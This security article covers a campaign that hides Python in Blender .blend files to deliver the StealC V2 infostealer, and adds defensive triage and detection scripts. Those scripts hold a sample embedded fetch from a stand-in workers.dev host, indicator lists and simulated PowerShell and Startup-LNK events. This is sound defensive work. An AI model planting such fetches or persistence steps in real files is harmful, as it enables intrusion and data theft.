Security researchers at Morphisec have identified a targeted malware campaign that abuses Blender, a popular open-source 3D creation suite, to deliver the StealC V2 infostealer. Attackers upload infected .blend project files to major 3D asset marketplaces such as CGTrader, putting freelance artists, studios, and production pipelines at risk whenever they download third‑party models.
How malicious Blender .blend files deliver StealC malware
Blender supports embedded Python scripts inside .blend files to automate workflows, create custom panels, manage rigs, and integrate with rendering pipelines. This extensibility is a core strength of the platform, but it also turns every complex project file into a potential container for executable code.
The key security setting in this context is Blender’s “Auto Run” feature, which automatically executes embedded Python code when a .blend file is opened. Many artists enable Auto Run for convenience, so rigs, UI tools, and drivers load instantly. Once it is enabled, however, opening a project from an untrusted source is effectively the same as running an unknown program.
In the campaign observed by Morphisec, attackers weaponize this feature using malicious .blend files containing hidden Python code. When the victim opens the project, the script silently connects to a domain hosted on Cloudflare Workers and downloads an intermediate loader. This loader then retrieves a PowerShell script, which in turn downloads two ZIP archives named ZalypaGyliveraV1 and BLENDERX from the attackers’ infrastructure.
The archives are extracted into the Windows %TEMP% directory. The script then creates LNK shortcut files in the Startup folder to achieve persistence, ensuring the malware runs whenever the operating system boots. Finally, the chain deploys two payloads: the primary StealC V2 infostealer and an additional Python-based stealer that acts as a redundant data theft channel should the main binary be disrupted.
StealC V2 infostealer: capabilities, evolution, and evasion
The campaign uses a recent build of StealC V2, previously analyzed by researchers at Zscaler and other vendors. StealC belongs to a class of information-stealing malware designed to harvest sensitive data from compromised systems and exfiltrate it to attacker-controlled servers.
Current variants of StealC V2 include modules that collect a broad range of data: browser credentials and cookies, saved passwords and autofill data, session tokens, data from local cryptocurrency wallets and browser wallet extensions, and, potentially, tokens from messaging and productivity applications. Such data enables account takeover, financial theft, and deeper compromise of corporate networks.
StealC V2 also implements an updated User Account Control (UAC) bypass mechanism, making it easier for the malware to perform high‑privilege operations without user confirmation. By combining stealthy installation, aggressive data collection, and privilege escalation, StealC presents a significant threat both to individual creators and to enterprise environments that rely on 3D tools.
Low detection rates and advanced antivirus evasion
Although StealC was first documented in 2023, the malware family is under active development, with frequent updates that complicate detection. According to Morphisec, the sample analyzed in this Blender campaign was not detected by any product on VirusTotal at the time of investigation. This points to extensive use of techniques such as code obfuscation, dynamic loading of components, and keeping overtly malicious behavior to a minimum until data exfiltration is triggered.
Why 3D assets and Blender projects must be treated as executable content
The most concerning aspect of this campaign is the use of 3D assets as an attack vector. Marketplaces like CGTrader typically validate visual quality and licensing, but they lack the ability to reliably inspect or sandbox all embedded Python scripts in .blend files before publication. As a result, even high-quality, legitimate-looking assets can conceal malicious logic.
From a security standpoint, any file format that supports scripting or macros—including Office documents, Adobe project files, and Blender scenes—should be regarded as potentially executable code. The security of these assets hinges on the trustworthiness of the author and the precautions taken by the end user, not just on the visual content.
Security recommendations for Blender users, 3D artists, and studios
1. Disable Auto Run by default. Keep Blender’s automatic Python execution turned off and only enable it for internally created projects or assets from thoroughly vetted vendors. Treat enabling Auto Run for an external file as equivalent to running an unknown application.
2. Use isolated environments for third‑party assets. Open downloaded .blend files from marketplaces in a virtual machine, container, or dedicated workstation that is isolated from production networks and sensitive data. This is particularly important for studios with shared asset libraries and render farms.
3. Inspect projects for embedded scripts and network activity. When in doubt, review a project’s text blocks, add-ons, and handlers for unfamiliar Python code. Any unexpected outbound network requests triggered by a Blender file should be treated as a serious warning sign and investigated immediately.
4. Restrict PowerShell and monitor endpoint behavior. In corporate environments, apply Group Policy, AppLocker, or similar controls to limit unsupervised PowerShell execution. Complement this with EDR solutions that can detect anomalous scripting activity, persistence mechanisms such as suspicious LNK files, and connections to unusual external infrastructure.
5. Train creative teams on supply-chain threats. 3D artists, technical directors, and pipeline engineers should understand that downloaded models can function as malware carriers. Security awareness programs for creative teams should cover safe asset sourcing, sandboxing workflows, and the specific risks of Auto Run and scripting.
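Recommendation 3 asks artists to look for embedded scripts before trusting a download. The script below is an added example (it is not from the Morphisec report and not part of Blender) of how to do that offline, without opening the file in Blender at all: it walks the classic .blend container layout (a 12-byte header followed by file blocks, each carrying a 4-byte code, payload length, old pointer, SDNA index and count), counts Text datablocks, and scans every block payload for tokens that suggest scripting or network access. The indicator list and the constructed sample file are assumptions made for this example; the tool is a triage heuristic, not a full SDNA parser.

```python
"""
Offline triage of a .blend file for embedded Python, without opening it in Blender.

Added example, not from the Morphisec report or the Blender project. Handles
the classic 12-byte header ("BLENDER" + pointer size + endianness + version),
plain or gzip-compressed files; zstd-compressed files (Blender 3.0+) are
reported and must be decompressed first.
"""
import gzip
import struct
import sys
from collections import Counter

GZIP_MAGIC = b"\x1f\x8b"
ZSTD_MAGIC = b"\x28\xb5\x2f\xfd"  # zstd frame magic

# Assumed triage tokens: a rig or UI helper rarely needs these, a downloader does.
INDICATORS = [
    b"import subprocess", b"subprocess.", b"os.system(", b"import socket",
    b"import urllib", b"urllib.request", b"import requests", b"bpy.app.handlers",
    b"exec(", b"eval(", b"base64.b64decode", b"powershell", b"http://", b"https://",
    b"workers.dev",
]


def load_blend_bytes(data: bytes) -> bytes:
    """Return uncompressed .blend bytes; gzip is handled, zstd is reported."""
    if data.startswith(GZIP_MAGIC):
        return gzip.decompress(data)
    if data.startswith(ZSTD_MAGIC):
        raise ValueError("zstd-compressed .blend: decompress with the 'zstandard' package first")
    return data


def parse_header(data: bytes) -> dict:
    """Decode the 12-byte header: 'BLENDER', pointer size, endianness, version."""
    if data[:7] != b"BLENDER":
        raise ValueError("not a .blend file (BLENDER magic missing)")
    ptr_size = 8 if data[7:8] == b"-" else 4    # '-' = 64-bit pointers, '_' = 32-bit
    endian = "<" if data[8:9] == b"v" else ">"  # 'v' = little-endian, 'V' = big-endian
    return {"ptr_size": ptr_size, "endian": endian, "version": data[9:12].decode("ascii")}


def iter_blocks(data: bytes):
    """Yield (code, payload) for each file block, stopping at the ENDB marker."""
    hdr = parse_header(data)
    fmt = "%s4si%dsii" % (hdr["endian"], hdr["ptr_size"])  # code, len, old ptr, SDNAnr, nr
    head_len = struct.calcsize(fmt)
    pos = 12
    while pos + head_len <= len(data):
        code, size, _old, _sdna, _count = struct.unpack_from(fmt, data, pos)
        pos += head_len
        yield code, data[pos:pos + size]
        pos += size
        if code == b"ENDB":
            break


def triage(raw: bytes) -> dict:
    """Summarise Text datablocks and script indicators found in a .blend image."""
    data = load_blend_bytes(raw)
    hdr = parse_header(data)
    hits, text_blocks, blocks = Counter(), 0, 0
    for code, payload in iter_blocks(data):
        blocks += 1
        if code.startswith(b"TX"):  # ID_TX: a Text datablock (Text Editor buffer / script)
            text_blocks += 1
        for token in INDICATORS:
            n = payload.count(token)
            if n:
                hits[token.decode()] += n
    return {"version": hdr["version"], "blocks": blocks, "text_blocks": text_blocks,
            "indicators": dict(hits), "review": bool(text_blocks or hits)}


def build_sample_blend(script: bytes) -> bytes:
    """Constructed fixture: a minimal 64-bit little-endian .blend with one Text
    datablock, one DATA block carrying the script bytes, and the ENDB marker."""
    def block(code: bytes, payload: bytes) -> bytes:
        return struct.pack("<4si8sii", code, len(payload), b"\x00" * 8, 0, 1) + payload
    return (b"BLENDER-v403" + block(b"TX\x00\x00", b"\x00" * 16)
            + block(b"DATA", script) + block(b"ENDB", b""))


if __name__ == "__main__":
    # With a path argument the real file is triaged; otherwise a constructed sample is used.
    if len(sys.argv) > 1:
        raw = open(sys.argv[1], "rb").read()
    else:
        raw = build_sample_blend(b"import urllib.request\n"
                                 b"urllib.request.urlopen('https://loader.example.workers.dev')\n")
    print(triage(raw))
```

A clean result is a negative triage, not a guarantee: obfuscated code, Python expressions in drivers, and scripts pulled in by a bundled add-on can all evade a token scan, so a file flagged "review" should be opened with automatic execution off (Blender's --disable-autoexec command-line switch) and its Text datablocks, drivers, and handlers read by hand.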
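Recommendation 4 calls for endpoint monitoring that catches the observable steps of this chain. The following is an added example of that detection logic, written here for illustration rather than taken from the report or from any EDR product: it runs a handful of rules over constructed process-creation, file-creation and network-connection events with Sysmon-like field names. The event schema, host names, paths and file names are all constructed for this example.

```python
"""
Detection rules for the Blender -> script host -> %TEMP% -> Startup-LNK chain,
applied to constructed endpoint telemetry. Added example; the event schema and
the sample events are constructed for illustration.
"""
import re
from typing import Any, Dict, List, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, Any]]) -> List[Tuple[str, Dict[str, Any]]]:
    """Return (rule name, event) pairs for events matching the chain's observable steps."""
    alerts = []
    for e in events:
        kind = e["event"]
        if kind == "process_create":
            parent, image = basename(e["parent_image"]), basename(e["image"])
            # Embedded Python runs inside blender.exe, so a shell or script host
            # whose parent is Blender is the first reliable process-tree signal.
            if parent == "blender.exe" and image in SCRIPT_HOSTS:
                alerts.append(("script host spawned by Blender", e))
            # Archives are unpacked to %TEMP% and their payloads executed from there.
            if TEMP_DIR.search(e["image"]) and image.endswith(".exe"):
                alerts.append(("executable launched from %TEMP%", e))
        elif kind == "file_create":
            # Persistence: a shortcut dropped into the per-user Startup folder.
            if STARTUP_LNK.search(e["target"]):
                alerts.append(("Startup-folder LNK created", e))
        elif kind == "network_connect":
            # The project file's script fetches its loader from a Cloudflare Workers host.
            if basename(e["image"]) == "blender.exe" and e["dest_host"].endswith(".workers.dev"):
                alerts.append(("Blender contacted a Cloudflare Workers host", e))
    return alerts


BLENDER = r"C:\Program Files\Blender Foundation\Blender\blender.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry: four malicious steps followed by two benign events.
SAMPLE_EVENTS = [
    {"event": "network_connect", "image": BLENDER,
     "dest_host": "loader.example.workers.dev", "dest_port": 443},
    {"event": "process_create", "parent_image": BLENDER, "image": POWERSHELL,
     "command_line": r"powershell.exe -File C:\Users\art\AppData\Local\Temp\stage.ps1"},
    {"event": "file_create", "image": POWERSHELL,
     "target": r"C:\Users\art\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Render.lnk"},
    {"event": "process_create", "parent_image": POWERSHELL,
     "image": r"C:\Users\art\AppData\Local\Temp\BLENDERX\loader.exe"},
    {"event": "process_create", "parent_image": r"C:\Windows\explorer.exe", "image": BLENDER},
    {"event": "file_create", "image": BLENDER,
     "target": r"C:\Users\art\AppData\Local\Temp\quit.blend"},  # Blender's normal autosave
]


if __name__ == "__main__":
    for rule, event in detect(SAMPLE_EVENTS):
        print(f"{rule}: {event}")
```

The %TEMP% execution rule is noisy on its own (installers and updaters do the same), so in production it is best scoped to process trees that already contain a Blender-spawned script host; the Startup-folder and parent-process rules are precise enough to alert on directly. Blender writing its own autosave into %TEMP% is expected and is deliberately not flagged.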
The StealC V2 campaign delivered through Blender underscores a broader trend: any widely used creative or production tool can become a high‑value target for attackers. Treating complex project files as active content, hardening default configurations, and isolating untrusted assets are now essential elements of a secure 3D workflow. Organizations that proactively integrate these practices into their pipelines will be far better positioned to prevent a seemingly harmless 3D model from becoming the initial foothold for a full‑scale compromise.